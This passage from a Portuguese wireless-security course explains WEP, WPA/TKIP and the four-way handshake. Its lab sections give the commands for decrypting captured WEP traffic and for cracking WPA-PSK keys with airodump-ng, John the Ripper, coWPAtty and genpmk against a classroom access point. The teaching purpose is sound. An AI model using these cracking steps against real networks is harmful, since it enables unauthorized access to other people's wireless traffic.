Nesta atividade, utilizaremos a ferramenta wep_decrypt para remover a proteção WEP do tráfego capturado. O resultado desse comando é um arquivo com o tráfego capturado aberto, ou seja, quadros 802.11 do tipo “data” (dados) desprotegidos de WEP, como se o tráfego capturado fosse de uma rede aberta. Primeiro vamos capturar mais tráfego da rede da qual já descobrimos a chave no exercício anterior. Use Airodump-ng especificando canal e SSID para capturar somente o tráfego que lhe interessa, ou seja, não capture o tráfego de outros Access Points. Verifique as opções do wep_decrypt:

# wep_decrypt
Execute o wep_decrypt usando os seguintes parâmetros. Vamos usar o arquivo que captu ramos e a chave WEP que já obtivemos.

# wep_decrypt –k chave /root/Desktop/SEG6/saidas/wep/trafego-wep. cap /root/Desktop/SEG6/saidas/wep/trafego-wep-aberto.cap
Lembre-se de que a chave tem 10 caracteres hexadecimais (0-9 a-f) se o AP foi configurado com WEP 40 bits. Se o AP foi configurado com WEP 104 bits, então o comprimento da chave é de 26 caracteres hexadecimais. Verifique o conteúdo decifrado (trafego-wep-aberto.cap) do tráfego, utilizando Wireshark. Observe que os quadros 802.11 do tipo “data” (dados) agora exibem o conteúdo em claro, ou seja, o conteúdo TCP/IP. Outra maneira de decodificar o tráfego WEP é com Kismet. Podemos fazer isso de duas formas: 11 Em tempo real; 11 Sobre um arquivo Pcap pré-capturado. Inicie o Kismet através do menu “BackTrack > Information Gathering > Network Analysis > WLAN Analysis > kismet”. Não precisamos configurar as fontes de captura no arquivo /usr/local/etc/kismet.conf, porque isso é feito de maneira automática. Entretanto, para con figurar o Kismet manualmente é necessário editar os arquivos kismet.conf e kismet_ui.conf (caso queira alterar a aparência da interface gráfica) e executar o próprio comando kismet (e não start-kismet-ng ). Em “/usr/local/etc/kismet.conf”, procure pelo trecho com a configuração de fontes de captura. Em seguida, configure a fonte de captura adequada para a interface do laboratório, que usa o módulo rt73.
Capítulo 6 - Roteiro de Atividades

ncsource=wlan0
A seguir, configure a decriptação automática do tráfego WEP, incluindo a seguinte linha:

wepkey=00:01:02:03:04:05,111111111111111111111111111

123

Onde: 11 00:01:02:03:04:05:06 é o BSSID do AP; 11 A cadeia de caracteres seguinte, separada por vírgula, é a chave da rede (10 caracteres hexadecimais para WEP 40 bits e 26 caracteres hexadecimais para WEP 104 bits). Ao iniciar o Kismet (comando kismet e não start-kismet-ng ), o tráfego do AP especificado será capturado e terá a proteção de WEP removida em tempo real. Pode confirmar com o comando “d” de Kismet, que imprime em tempo real todo texto em claro (ASCII) contido no arquivo de captura. O Kismet também pode ser usado para decriptar tráfego WEP pré-capturado, seja com Kismet, TCPdump ou Airodump-ng (pacote Aircrack-ng), ou seja, arquivos no formato tcpdump/libpcap. Para isso substitua o “capture source” da interface de rede 802.11 USB pela seguinte fonte de captura:

pcapfile
Leia a seção 12 da documentação de Kismet (Capture Sources) para conhecer os parâmetros desta fonte de captura. Depois de configurado, basta iniciar o Kismet. Todo o tráfego do arquivo de formato libpcap será rapidamente processado por Kismet.

124

Segurança em Redes sem Fio

7
Redes WPA-PSK
objetivos
Apresentar conceitos de redes WPA que usam chave compartilhada; mostrar mecanismos de autenticação e geração de chaves; ensinar a auditar uma rede WPA-PSK; apresentar o TKIP, mecanismo de segurança criado para resolver os problemas de WEP.

conceitos

WPA, TKIP e redes WPA-PSK.

Introdução
WPA: 11 Wi-Fi Protected Access (abril de 2003). 11 Trabalho conjunto entre Wi-Fi Alliance e IEEE. 11 Baseado no draft de 802.11i (pré-padrão). 11 Resolveu todos os problemas de WEP. 11 Projetado para causar pouco impacto no desempenho da rede e ser implementável por upgrade de software. 11 TKIP para cifragem dos dados. WPA é a primeira implementação do padrão IEEE 802.11i e conta com a maioria de suas

q

especificações. É baseada em Temporal Key Integrity Protocol (TKIP) para confidencialidade e integridade dos dados. Assim como WPA2 e Wi-Fi, WPA não é um padrão propriamente dito. É uma certificação que a Wi-Fi Alliance concede a produtos, com base em primeiro lugar em interoperabilidade entre fabricantes. O padrão IEEE em questão é o 802.11i, implementado por completo em WPA2, e parcialmente (baseado no draft) em WPA (pré-padrão). O protocolo TKIP foi criado
Capítulo 7 - Redes WPA-PSK

considerando duas limitações: 11 Implementável por meio de upgrade de software, de forma que não seja necessário upgrade de hardware. Essa condição limitou a escolha de mecanismos de segurança; 11 Limitação de processamento dos dispositivos, uma vez que dispositivos de rede como interfaces de rede e Access Points não possuem poder de processamento significativo.

125

WPA
Personal: 11 Não requer servidor de autenticação. 11 Pre-Shared Key (PSK). 11 Ambientes domésticos e pequenos escritórios (SOHO). Enterprise: 11 Centraliza autenticação com um servidor de autenticação central. 11 802.1x com gerência de chaves por métodos EAP. 22 EAP-TLS, EAP-TTLS/MSCHAPv2, PEAPv0/PEAP-MSCHAPv2, PEAPv1/EAP-GTC e EAP-SIM.

q

O WPA pode ser implantado de dois modos diferentes, de acordo com o porte e as necessi dades da empresa: 11 Personal: voltado para o mercado doméstico e de pequenas empresas (SOHO), imple menta autenticação por chave pré-compartilhada (PSK), ou seja, a distribuição das chaves é feita manualmente entre as estações; 11 Enterprise: voltado para implantações maiores, esse modo implementa autenticação 802.1x com um dos tipos de EAP disponíveis. 11 Projetado para substituir WEP sem a necessidade de substituir hardware. 11 Baseado em RC4, como WEP. 11 Resolve os problemas de WEP. 22 IV de 48 bits e regras de sequenciamento. 22 MIC Michael. 33 Message Integrity Code. 22 Derivação e distribuição de chaves. 22 Chave por pacote com TKIP. 33 Temporal Key Integrity Protocol. O desenvolvimento de WPA foi pautado com uma importante condição: ser implantado em hardware existente. Essa condição influenciou diversos de seus componentes na limitação de processamento ou com a necessidade de ser atualizável por software. WPA resolveu as vulnerabilidades de WEP de três formas diferentes: 11 IV de 48 bits e regras para a sequência: aumenta o espaço do IV de 24 para 48 bits, isto é, mais de 500 trilhões de possibilidades. Outra medida que afeta os IVs é a existência de regras que definem como os IVs serão selecionados e verificados; 11 Michael: WEP não implementava Message Integrity Check (MIC) em seu protocolo, essen Segurança em Redes sem Fio

q

cial na prevenção de ataques de replay. WPA adota um MIC chamado Michael, que foi projetado levando em consideração os mesmos limites de hardware de WEP; 11 TKIP: mecanismo que gera chaves únicas por pacote.

TKIP – MIC
11 Temporal Key Integrity Protocol. 11 Conjunto de mecanismos de segurança.

q

126

11 Melhora segurança em relação a WEP, mesmo com limitações de projeto. 22 MIC: proteção contra tráfego forjado. 22 Sequenciamento do IV: proteção contra ataques de replay. 22 Rekeying: contra-ataques que abusam da reutilização de chaves. 22 Key Mixing: proteção da chave em si.

q

TKIP é o protocolo que provê a confidencialidade e a integridade ao tráfego da rede que WEP não proporcionava. Juntamente com a possibilidade de autenticação 802.1x/EAP no modelo Enterprise, TKIP melhora a proteção da rede por diversos mecanismos: 11 Hierarquia e gerenciamento de chaves que eliminam a previsibilidade de WEP; 11 Proteção contra forjamento de pacotes com MIC (Message Integrity Check); 11 Aumenta o tamanho da chave de 40 para 128 bits; 11 Substitui a chave estática de WEP. A seguir, veremos cada uma destas melhorias em mais detalhes.

WEP
CRC32: 11 Permite duas entradas com o mesmo checksum. Sem MIC: 11 Atacante pode capturar, alterar e injetar tráfego com mesmo checksum. 11 Explorado em ataques de replay. Uma das vulnerabilidades de WEP é permitir que seu tráfego seja capturado, alterado e retransmitido. Isso é possível porque a função de hash CRC32 (Cyclic Redundancy Check) –

q

usada tanto no checksum ICV quanto no FCS de WEP – possibilita que o conteúdo do pacote seja alterado, obtendo um mesmo checksum CRC32. Em WPA, este problema foi resolvido com a introdução de Michael como MIC.

Michael
11 Gera hash de 64 bits. 11 A partir de cabeçalho + payload e chave de 64 bits. 11 Transmissor envia hash com pacote cifrado. 11 Receptor verifica hash no recebimento. O protocolo usado para MIC em TKIP se chama Michael, criado por Niels Fergunson.

q

Essa função de autenticação recebe, como entradas, dados arbitrários (cabeçalho e payload, no caso de 802.11) e uma chave de 64 bits para gerar um hash de 64 bits, incluído no pacote. a mesma chave usada pelo sistema que transmitiu. Se um atacante alterar o pacote em trânsito, essa alteração se refletirá no hash, que será diferente do esperado pelo sistema receptor, porque o atacante não possui a chave MIC de 64 bits.
Capítulo 7 - Redes WPA-PSK

Recebido o pacote, o sistema receptor aplica Michael novamente para gerar o hash, com

127

TKIP – sequência do IV
Ataques de replay. 11 WEP não impõe restrições sobre a seleção de IVs. 22 Não há proteção contra replay. Atacante pode capturar e retransmitir pacotes. 11 Não é necessário conhecer o conteúdo dos pacotes. 11 Usado para repetir uma dada transação na rede.

q

Outro problema de WEP é a ausência de um mecanismo de restrição à sequência de valores de IV selecionados. O IV não é usado como indicador da sequência com que os pacotes tra fegam na rede, servindo apenas para cifrar e decifrar tráfego em conjunto com a chave WEP. Essa característica permite que um atacante injete, na rede em questão, tráfego capturado previamente – evento que o sistema receptor não tem condições de detectar. Um fator que certamente facilita esse tipo de ataque é que não é necessário conhecer o con teúdo do tráfego capturado para retransmiti-lo, ou seja, não é necessário ter a chave WEP.

Para pensar
Um atacante poderia utilizar essa técnica para provocar um tráfego que lhe inte resse na rede; por exemplo: a resposta de um sistema financeiro que ele sabe, de antemão, que opera em rede sem fio.

Ataques de replay: como TKIP resolveu o problema
11 Requer IVs sequenciais, controlados por estações e APs. 11 IV transmitido em claro. 11 IVs menores que os anteriores são descartados. 11 IVs maiores que o esperado passam por outros processos de validação. TKIP resolve o problema de WEP de uma maneira simples: exige que todas as estações e

q

Access Points da rede usem IVs sequenciais, que começam em 0 (zero) e são incrementados de 1 (um). As estações devem manter controle sob o número de sequência de cada uma das outras estações. No caso de receberem um pacote com IV menor que um anteriormente recebido, o pacote é simplesmente descartado. Por outro lado, se o IV tem valor maior que o esperado, então o pacote passa por verificação de MIC e de chave de cifragem antes que o contador da estação seja atualizado com o novo valor. O IV é transmitido no primeiro e terceiro bytes do pacote, possibilitando IVs de 16 bits (65.535).
Segurança em Redes sem Fio

É interessante observar que, diferente de WEP, os IVs nunca são repetidos: o número de sequência é reiniciado antes de voltar a 0 (zero) e as chaves passam por rotação permanente.

Rekeying
11 Problema de WEP, que eventualmente reutilizava chaves. 11 Colisões de IV. 11 Ataque possível com texto em claro conhecido.

q

128

A repetição de chaves invalida o protocolo RC4. Em redes WEP esse evento acontece, uma vez que há apenas 16 milhões de valores IV únicos. Uma solução para esse problema seria a troca periódica e automática da chave WEP, o que é possível somente com extensões disponíveis em 802.1x. Entretanto, a rotação baseada em tempo, usada em Dynamic WEP, é ineficiente a taxas altas de transferência. Assim, a rotação deveria ter, como gatilho, o número de pacotes enviados e recebidos, e não o tempo de duração desta operação.

Rekeying – a solução de WPA
Três níveis de chave e rotação regular. Tipos: 11 Master Key. 11 Intermediate Key. 11 Temporal Key. Distribuição por mensagens EAPOL-Key (EAP Over LAN).

q

TKIP resolveu o problema de reemissão de chaves de WEP com a implantação de três tipos de chave aliada à rotação regular. Os níveis das chaves são os seguintes: 11 Master Key : chave-mestra usada para proteger a chave intermediária. É a chave de maior nível, derivada de uma transação 802.1x ou de uma chave pré-compartilhada, no caso de WPA-PSK; 11 Intermediate Key : misturando informações únicas de cada par de conexão (origem e destino), para evitar ataques por parte de quem conhece a chave PSK, sua função prin cipal é proteger as chaves temporárias; 11 Temporal Key : nível mais baixo da chave usada para cifrar os dados. Sofre rotação antes que os valores se repitam. A rotação de chaves temporárias é realizada por mensagens do tipo EAPOL-Key.

Key Mixing
11 Problema de WEP. 11 Ocorrência de IVs fracos revela a chave WEP. 11 Ataques FMS (Fluhrer, Mantin e Shamir). 11 Divulgação do IV reduz eficácia da chave. 11 Colisão de chaves. 11 Solução deveria se limitar aos mesmos 3 bytes reservados para IV. A divulgação do IV pelo protocolo WEP é outro ponto de vulnerabilidade, pois permite que

q

WPA mitiga esse problema ao levar em conta as limitações de projeto, isto é, deveria usar os mesmos 3 bytes reservados para IV em WEP, para que fosse possível a atualização por software. Para WPA, foi desenvolvido o mecanismo de mistura de chaves (key mixing).

129

Capítulo 7 - Redes WPA-PSK

um atacante identifique colisões simplesmente ao capturar tráfego na rede em questão.

Key Mixing – solução de WPA
Chave temporária para cifrar dados, em vez de PSK. Fases: 11 1: mistura endereços MAC e chave para produzir “chave intermediária (PTK)” – PSK > PMK > PTK. 11 2: cifra o número de sequência com a chave intermediária ou temporária. 11 Resultado: chave de 128 bits. A função do campo IV WEP comporta os três primeiros bytes da chave resultante. Em vez de cifrar os dados com a chave pré-compartilhada (como em WEP), WPA cifra os dados com uma chave temporária. Esse processo é composto de duas fases: 11 Na fase 1: uma PMK (Pairwise Master Key) é criada a partir da PSK e depois misturada

q

com os endereços MAC de origem e destino, gerando uma chave intermediária chamada Pairwise Transient Key PTK (); 11 Na fase 2: o número de sequência do pacote é cifrado com a chave temporária, resul tando em uma chave de 128 bits que será usada na transação. A chave de 128 bits é usada para cifrar o pacote, sendo que os primeiros 3 bytes são transmitidos no campo que comporta IV em WEP. Os endereços MAC são misturados com a chave temporária, o que torna a chave única, mesmo se todos os clientes usam a mesma PSK e PMK. Mesmo que um atacante tivesse acesso a esta chave de 128 bits resultante do processo, ele não seria capaz de determinar estas duas últimas chaves.
Figura 7.1 Detalhes de informação da chave.

TKIP – 4-Way Handshake

130

Segurança em Redes sem Fio

O handshake de TKIP é a maneira pela qual Supplicant e Authenticator trocam os dados necessários para gerar a Pairwise Temporal Key (PTK). Para que PTK seja gerado, assume-se que AP e estação tenham conhecimento de: 11 Paiwise Master Key (PMK), resultado da chave pré-compartilhada em WPA-PSK ou resul tado de uma transação do protocolo 802.1x para WPA-Enterprise; 11 Seus próprios endereços MAC, uma vez que PTK é gerado a partir da concatenação de PMK, ANonce, SNonce, MAC do AP e MAC da estação. No primeiro quadro, temos uma seção “Key Information”, que fornece informações sobre tipos de chaves que serão trocadas: “HMAC-MD5” para MIC, e RC4 para “cifragem”.

Figura 7.2 Valores das chaves.

Nessa nova visão do primeiro quadro, é possível visualizar o ANonce, indicador de uma nova negociação PTK. Em segurança, “nonce” é um “number used once”, um número aleatório ou pseudoaleatório usado apenas uma vez, cujo objetivo é evitar que uma comunicação antiga seja reutilizada em ataques do tipo replay. Esse quadro contém o primeiro de dois nonces usados no cálculo de PTK, o ANonce (A de AP). (PTK). A estação precisa desse dado para construir o PTK. O quadro em particular não carrega MIC porque o Authenticator ainda não possui informações suficientes para gerar o PTK, não tendo, portanto, um valor de MIC necessário para o cálculo. O segundo quadro tem origem no Supplicant, e contém o nonce do Supplicant e o MIC do quadro. Antes de transmitir esse quadro, o Supplicant tem conhecimento das informações de nonce do Supplicant e pode calcular o PTK. Com o PTK calculado, a chave MIC HMAC-MD5 é conhecida e será usada no algoritmo HMAC-MD5 para gerar um MIC de 128 bits. 131
Capítulo 7 - Redes WPA-PSK

Em posse desse valor, a estação (STA) tem a capacidade de construir a Pairwise Transient Key

Quando o Authenticator recebe esse segundo quadro, extrai o nonce do Supplicant e pode calcular o PTK usando a chave HMAC para validar o MIC do pacote.

O penúltimo quadro do handshake se origina do Authenticator, que inclui o Group Temporal Key (GTK) e um número de sequência juntamente com um MIC. O número de sequência é usado no próximo quadro multicast ou broadcast, de forma básica de detecção de replay pelas estações. Esse quadro garante para o Supplicant que não há nenhum atacante “homem do meio” (Man In The Middle – MITM), ou seja, que o quadro não foi alterado no caminho. Essa verificação garante também que o Authenticator calculou o PTK corretamente.

Figura 7.3 Handshake. Supplicant confirma nonces únicos e PTK corretos.

132

Segurança em Redes sem Fio

Figura 7.4 Pronto para transmitir e receber dados.

O último quadro do handshake vem do Supplicant, que reconhece o recebimento do quadro anterior. Esse quadro também serve para indicar que o Supplicant está pronto para transmitir e receber dados.

STA ANonce

AP

STA constrói o PTK SNonce + MIC

AP constrói o PTK GTK + MIC Ack

Figura 7.5 As quatro etapas do handshake TKIP.

O gráfico ilustra as quatro etapas do handshake TKIP, descritas passo a passo anteriormente. O objetivo dessa transação é fornecer ao cliente a Pairwise Transient Key (PTK), a chave temporária que valerá até a próxima emissão de chaves, usada na geração de três novas chaves: 11 EAPOL-Key Confirmation Key (KCK): chave usada para computar o MIC em pacotes EAPOL-Key; 11 EAPOL-Key Encryption Key (KEK): chave usada para cifrar os pacotes EAPOL-Key; 11 Temporal Key (TK): chave usada para cifrar o tráfego sem fio em si.

133

Capítulo 7 - Redes WPA-PSK

Outro objetivo desta transação é fornecer para a estação o número de sequência usado na transmissão de tráfego broadcast e multicast.

Identificando redes WPA-PSK
Quadros beacon: 11 Divulgam características do AP. 11 Identificam WPA-PSK. 11 Suporte a TKIP – 11 WPA. 11 Auth Key Management – 11 PSK. Antes de auditar a rede, é importante confirmar se ela realmente é baseada no protocolo TKIP com autenticação por chaves pré-compartilhadas (WPA-PSK). Quadros beacon são transmitidos com uma frequência muito alta (10 vezes por segundo) e auxiliam na identifi cação dessas redes.

q

Filtro de Wireshark

Figura 7.6 Quadro beacon de uma rede WPA-PSK

Segurança em Redes sem Fio

O quadro beacon possui um tag de gerenciamento que indica os mecanismos de cifragem e o gerenciamento de chaves de autenticação suportadas pelo AP. Podemos usar a ferramenta Wireshark para identificar quadros que contenham esse tag de gerenciamento definindo TKIP ou AES como cifrador e esquema de gerenciamento de autenticação como PSK ou 802.1x. O slide mostra o quadro beacon de uma rede WPA-PSK, selecionado com o seguinte filtro:

134

wlan_mgt.tag.number eq 221
Esse tag tem 22 bytes e é interpretado pelo Wireshark diversas vezes, o que nos traz informações interessantes: 11 TKIP é o cifrador tanto para unicast quanto para multicast; 11 PSK é o tipo de gerenciamento de autenticação por chaves.

Ataques contra WPA-PSK
11 Falha na derivação de PTK. 11 Ataque off-line de dicionário. 11 Requisito: capturar handshake. Implementação do ataque: coWPAtty. 11 Versões mais recentes com ataque pré-computado. 22 Ataques muito mais rápidos. 22 Pré-computado com dicionário e SSID.

q

w
Leia o texto “Weakness in Passphrase Choice in WPA Interface”, de Robert Moskowitz, e visite o site coWPAtty: https://sourceforge. net/projects/cowpatty

Com seu artigo publicado em 2003, Robert Moskowitz apontou para uma fraqueza no processo de derivação da Pairwise Transient Key (PTK) de redes WPA-PSK. Essa vulnera bilidade permite que um atacante realize um ataque de dicionário off-line contra a chave pré-compartilhada (PSK), coletando apenas o conteúdo do handshaking. Joshua Wright, do SANS Institute, implementou esse ataque na ferramenta coWPAtty, que será abordada em mais detalhes na atividade prática deste Capítulo.

Melhorando a segurança de WPA-PSK
11 Insegurança está em senhas compartilhadas. 11 Limitar conhecimento da chave. 11 Difícil de gerenciar em ambiente corporativo. 11 Seleção de senha forte. 11 Combinação variada de mais de 20 caracteres. 11 Solução: WPA com 802.1x/EAP. 11 Elimina o compartilhamento da chave PSK. Devemos ter em mente que WPA-PSK é voltado para o mercado doméstico e de pequenas empresas (SOHO), uma vez que o gerenciamento das chaves se torna impraticável em ambiente corporativo. Considerando esse escopo de WPA-PSK, duas medidas podem ser tomadas para melhorar a sua segurança: 11 Limitar o conhecimento da senha, algo subjetivo demais para ser considerado como 11 Seleção de senhas fortes, com caracteres variados e com pelo menos 20 caracteres de extensão.

q

Essas são as duas medidas de segurança possíveis, desconsiderando segurança em profun didade – implantação de VPN, firewall e outras medidas de apoio à segurança da rede no nível da camada 2. A única maneira de se elevar o mecanismo de segurança da rede sem fio em si é migrar para o modelo WPA-Enterprise, ou seja, implantar autenticação 802.1x com um dos métodos Extensible Authentication Protocol (EAP).

135

Capítulo 7 - Redes WPA-PSK

medida de segurança;

Vulnerabilidades do TKIP
Apesar das implementações de segurança, o protocolo TKIP é vulnerável. 11 Utiliza um mecanismo de verificação de integridade basedado no CRC32. 11 Ataque Beck-Tews (QoS). 11 Ataque Origashi-Morii (MITM). Apesar do protocolo TKIP implementar uma solução contra replay de pacotes, essa não foi sufi-

q
l
No artigo “Practical attacks against WEP and WPA”, Martin Beck e Erick Tews demonstram esse ataque, que ficou conhecido como ataque Beck-Tews. Leia também o artigo “ A Practical Message Falsification Attack on WPA” de Toshihiro Ohigashi e Masakatu Morii.

ciente, uma vez que ainda utiliza um mecanismo de verificação de integridade baseado em CRC32. A realização desse ataque não é simples, pois depende de um access point com suporte a QoS, pois o ataque utiliza os canais QoS para transmitir os pacotes “reconstruídos”. Esse ataque pode ser realizado com a ferramenta tkiptun-ng, disponibilizada pelo Aircrack-ng, porém não realizaremos esse ataque devido à falta de suporte de QoS pelo AP que utilizamos nos testes. Em 2009, dois pesquisadores japoneses, Toshihiro Ohigashi and Masakatu Morii, apre sentaram um paper com uma forma mais eficiente de executar o ataque de Beck-Tews, utilizando uma técnica de Man In The Middle. Porém, esse ataque não foi implementado oficialmente na ferramenta tkiptun-ng.

WPA2
WPA2 é a implementação de fato do modelo de segurança proposto em 802.11i. 11 Implementa 802.11i por completo. 11 TKIP > CCMP. 11 RC4 > AES. 11 Também nas versões Personal e Enterprise.

q

A implementação completa de 802.11i é oferecida por WPA2 e apresenta as seguintes características: 11 WPA2 Personal e Enterprise: assim como WPA, é possível usar chave pré-compartilhada (PSK) ou autenticação 802.1 com um dos tipos de EAP disponíveis. 11 Robust Security Network (RSN) para associações. 11 Counter Mode with Cipher Block Chaining Message Authentication Code Protocol (CCMP) para prover confidencialidade, integridade e autenticação. Baseado no algoritmo Advanced Encryption Standard (AES). 11 A implementação desse protocolo foi feita completamente do zero, baseado nos estudos dos protocolos 802.10 e IPsec, não tendo nenhuma relação com WEP e necessitando suporte específico tanto de hardware quanto de software no AP e na interface de acesso. 11 A implementação de WPA2, bem como WPA associado a 802.1x e EAP, será abordada nos
Segurança em Redes sem Fio

Capítulos 9 e 10. Neste Capítulo, implantaremos uma WLAN mais segura, baseada em WPA2 (AES/CCMP) e com autenticação 802.1x pelo EAP type EAP-TLS.

136

Roteiro de Atividades 7
Atividade 7.1 – Descobrindo a chave WPA-PSK por ataque de dicionário
Neste exercício, constataremos que os protocolos WPA Personal (WPA-PSK) e WPA2 Personal (WPA2-PSK) – mecanismos de segurança que muitos usuários consideram invulneráveis – são suscetíveis a ataques de dicionário. Usaremos a ferramenta coWPAtty, desenvolvida por Joshua Wright (SANS Institute/Aruba Networks) para aplicar esse ataque. Os arquivos de demonstração estão no seguinte diretório: 11 /root/Desktop/SEG6/wpa/exemplo-john-rules.txt : exemplo de derivações de uma palavra (“exemplo”) depois de processadas pelo utilitário John the Ripper com o parâ metro “--rules” 11 wordlist-portugues-john-rules.txt: palavras de dicionário parcial depois de processadas pelo utilitário John the Ripper com o parâmetro “--rules”; 11 wordlist-portugues-john-rules.hash: arquivo de hash coWPAtty (genpmk) para o SSID “rnpesr”, usando o arquivo wordlist-portugues-john-rules.txt como fonte; 11 wordlist-portugues.hash: arquivo de hash coWPAtty (genpmk) para o SSID “rnpesr”, usando o arquivo wordlist-portugues.txt como fonte; 11 wpa-eapol-rnpesr.cap: arquivo em formato tcpdump/libpcap com tráfego EAPOL (EAP over LAN) de uma associação entre um cliente e um AP em uma rede configurada com WPA Personal (TKIP) e SSID “rnpesr”. Para usar a ferramenta coWPAtty, o aluno precisa de um arquivo com no mínimo um handshake TKIP, como esse. Todos esses arquivos (exceto exemplo-john-rules.txt ) serão criados pelo aluno na segunda fase do laboratório, em ambiente ao vivo. Considere-os como modelos. 1. Abra o arquivo pré-capturado “wpa-eapol-rnpesr.cap” usando a ferramenta Wireshark. Verifique a existência do tráfego four-way-handshake da autenticação ou associação do cliente e o tipo de chave usada (WPA). A captura desse tráfego é essencial na utilização do coWPAtty. Veja as opções deste comando:

# cowpatty
Atenção aos parâmetros “-f”, “-s” e “-r”. Mais adiante utilizaremos também o parâmetro “-d” para lidar com hashs de senha pré-processados para um determinado SSID, usando o comando genpmk (pacote coWPAtty). Para iniciar o ataque off-line de força bruta contra o arquivo de captura wpa-eapol-rnpesr.cap, use o comando:
Capítulo 7 - Roteiro de Atividades

# cowpatty –f /root/Desktop/SEG6/wpa/wordlist-portugues.txt –s rnpesr –r /rnp-esr/7-wpa/demo/wpa-eapol-rnpesr.cap Aguarde.
Anote o tempo gasto no processo: .

137

Se ao final da execução do comando tivermos a seguinte saída, nenhuma das palavras é a chave PSK (Pre-Shared Key) da rede “rnpesr”.

Unable do identify the PSK from the dictionary file. Try expanding your passphrase list, and double check the SSID. Sorry it didn’t work out.

1158 passphrases tested in 28.53 seconds: 40.59 passphrases/second
Siga a orientação da própria saída do programa, ou seja, expanda a sua lista de palavras. Isso pode ser feito com a mesma lista de palavras (wordlist); usaremos a ferramenta John the Ripper (john) para esse fim. Um dos recursos dessa ferramenta é o parâmetro “--rules”, que testa diversas variações comuns de cada uma das palavras. Execute o seguinte comando:

# john –-wordlist=/root/Desktop/SEG6/wpa/wordlist-portugues.txt -– rules --stdout > /rnp-esr/7-wpa/saidas/wordlist-portugues-john.txt
O resultado desse comando deve ser igual ao arquivo /root/Desktop/SEG6/wpa//wordlist-portugues-john-rules.txt. Confira. Para compreender melhor o efeito do parâmetro “rules” da ferramenta John the Ripper, con sulte o arquivo exemplo-john-rules em /root/Desktop/SEG6/wpa//exemplo-john-rules.txt. Essa foi a saída para o comando sobre um arquivo que tinha apenas uma palavra, “exemplo”. 2. Repita a operação: repita o comando cowpatty para verificar se o aumento no universo de palavras foi suficiente para permitir a descoberta da chave dessa rede. Use o arquivo que geramos, wordlist-portugues-john.txt. Note que a diferença na quantidade de palavras é bem significativa. O primeiro arquivo tem 1.383 linhas/palavras. Consulte o número de palavras da segunda lista de palavras:

# wc -l /root/Desktop/SEG6/wpa//saidas/wordlist-portugues-john.txt
Esse aumento naturalmente vai causar impacto no tempo de execução da ferramenta coWPAtty. Anote o tempo gasto no processo: .

Atividade 7.2 – Descobrindo a chave WPA-PSK por ataque de dicionário de maneira muito mais rápida
É possível reduzir drasticamente o tempo do ataque por meio do uso de hash de senhas pré-computadas, levando em consideração o SSID, elemento usado no mecanismo de autenticação ou associação. Verifique as opções do comando:
Segurança em Redes sem Fio

# genpmk
Para criar esse arquivo de hash:

# genpmk –f arquivo_de_wordlist –s rnpesr –d arquivo_de_wordlist. hash
Escolha a lista de palavras com a qual tivemos sucesso na etapa anterior (antes ou depois de John the Ripper). Coloque esse arquivo como parâmetro “-f”.

138

Uma vez gerado o hash file, podemos executar novamente o coWPAtty, agora usando esse arquivo em vez do dicionário. Note que não usamos mais o parâmetro “-f” (dictionary file), e sim “-d” (arquivo hash gerado pela ferramenta genpmk ).

# cowpatty –d arquivo_de_wordlist.hash –s rnpesr –r /root/Desktop/ SEG6/wpa/wpa-eapol-rnpesr.cap
Observe a execução do coWPAtty e anote o tempo que a ferramenta levou para descobrir as senhas. Qual foi a principal diferença observada entre os dois métodos de descoberta da chave? Note que esse arquivo hash só pode ser utilizado para ataques contra o SSID usado no comando genpmk.

Atividade 7.3 – Realizando um ataque contra a rede do laboratório
O primeiro passo para efetuar um ataque real é capturar o tráfego de um cliente se associando a um AP configurado com WPA-PSK. Para isso, você aplicará o que aprendeu na sessão prática que trata de captura. Você deve conhecer, de antemão, o canal da rede a ser atacada e o SSID da mesma. O primeiro dado é importante na captura, enquanto o último é importante para o ataque em si. Você usará a ferramenta Airodump-ng para capturar os pacotes durante a associação de um cliente ao AP. Nesse momento existe um AP configurado com WPA-PSK. O instrutor informará canal, SSID e BSSID (endereço MAC do AP).

# airmon-ng start wlan0
Depois de configurada a interface, já podemos começar a capturar pacotes interessantes, ou seja, o processo de associação e handshaking TKIP. Apenas um aluno e o instrutor conhecem a chave da rede WPA Personal/WPA PSK. A estação de trabalho será associada ou desassociada para gerar o tráfego de que você precisa.

# cd /root/Desktop/SEG6/wpa/saidas/ # airodump-ng --channel X --bssid rnpesr2 -w airodumpng-rnpesr2
Onde X é o canal que o instrutor forneceu, “BSSID” é o BSSID que o instrutor forneceu e PREFIXO é um campo livre para definição do prefixo do nome de arquivo de saída. Outra maneira de descobrir esses dados da rede é com as ferramentas Kismet. Neste ponto, um cliente WPA-PSK iniciará um processo de autenticação ou associação com o AP. Tão logo acreditemos que já tenha sido capturado o tráfego de um cliente associado, é preciso interromper a captura com o comando “Control + C”. A chave da rede é uma das palavras da lista fornecida no início desta prática, wordlist-portugues.txt. A chave também pode ser uma variação deste arquivo, gerada pela ferramenta John the Ripper. Para iniciar o ataque off-line de força bruta contra o arquivo capturado, use a ferramenta coWPAtty:
Capítulo 7 - Roteiro de Atividades

# cowpatty –f /root/Desktop/SEG6/wpa/wordlist-portugues.txt –s rnpesr2 –r airodumpng-rnpesr2-01.cap
Note que cada vez que executamos o comando airodump-ng, é criado um novo arquivo de captura sequencial. Exemplo: para um prefixo rnp (comando airodump-ng ), os arquivos são rnp-01.cap, rnp-02.cap e assim por diante. Observe o tempo que coWPAtty leva para descobrir a chave e anote: .

139

Agora vamos realizar o mesmo ataque usando hashs de chaves pré-computados com a ferramenta genpmk.

# cd /root/Desktop/SEG6/wpa/saidas # genpmk –f /root/Desktop/SEG6/wpa/wordlist-portugues.txt –s rnpesr2 –d wordlist-portugues.hash
Uma vez gerado o arquivo hash, execute novamente o coWPAtty, agora usando esse arquivo em vez do dicionário:

# cd /root/Desktop/SEG6/wpa/saidas # cowpatty –d wordlist-portugues.hash –s rnpesr2 –r airodumpngrnpesr2-01.cap
Ou:

# cd /root/Desktop/SEG6/wpa/saidas # cowpatty –d wordlist-portugues.hash –s rnpesr2 –r airodumpngrnpesr2-02.cap
Anote o tempo gasto: .

140

Segurança em Redes sem Fio

8
Sistemas de detecção de intrusões (IDS) em redes WLAN
objetivos
Apresentar conceitos de IDS no contexto de uma WLAN; mostrar os principais métodos de detecção de ataques em redes sem fio; identificar características importantes de um IDS – importantes na compra e implantação de um IDS.

conceitos

Funcionalidades de um AP pela instalação de OpenWRT.

Introdução
11 Conceitos de IDS. 11 Modelos de implantação. 11 Métodos de detecção. 11 Avaliação de soluções de IDS. 11 Características importantes.

q

